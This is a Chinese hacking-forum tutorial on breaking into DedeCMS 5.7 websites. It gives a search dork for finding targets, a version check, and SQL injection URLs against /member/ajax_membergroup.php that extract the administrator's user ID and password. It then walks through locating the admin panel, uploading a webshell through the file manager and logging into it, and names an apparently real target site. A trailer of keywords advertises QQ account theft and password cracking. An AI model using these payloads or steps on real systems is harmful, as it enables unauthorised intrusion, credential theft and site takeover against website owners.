a您现在的位置: 主页 > 黑客联盟 > 黑客入侵网站 > 文章内容

dedecms 版本漏洞-盗号网站

作者: 中国黑客基地 来源:黑客QQ 时间: 2015-06-02 阅读: 黑客入侵网站

织网5.7的漏洞,可任意上传~

搜索关键词:Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc

访问/data/admin/ver.txt来查看cms

然后访问/member/ajax_membergroup.php?action=post&membergroup=1,出现"朋友 修改"即可注入

通过注入得到管理员帐号密码,搜后台,上传大马OK~提权还在学习阶段~

1

查看网站的版本

code 区域
cms /data/admin/ver.txt

2

查看是否有"朋友 修改",有则存在注入

 

code 区域
/member/ajax_membergroup.php?action=post&membergroup=1

3

帐号

code 区域
http://www.dzdyk.com /member/ajax_membergroup.php?action=post&membergroup=@`'` Union select userid from `%23@__admin` where 1 or id=@`'`

4

去掉前三位和最后一位,得到管理员密码

code 区域
/member/ajax_membergroup.php?action=post&membergroup=@`'` Union select pwd from `%23@__admin` where 1 or id=@`'`

5

扫后台,登录成功

6

后台页面

7

模块-文件管理器-文件上传 上传大马

8

登录webshell

盗号网站|盗QQ|盗QQ号教程|盗QQ号密码|盗QQ号码|盗QQ密码软件|恢复QQ聊天记录|怎么破解QQ密码|怎样盗QQ密码|怎么盗QQ|怎样破解QQ号|黑客技术|QQ密码暴力破解器|盗号方法|盗号软件|怎么盗QQ|盗QQ密码|恢复QQ聊天记录|盗QQ软件|QQ密码破解软件|QQ黑客工具|免费黑客网|黑客基地|黑客联盟_www.heike.hk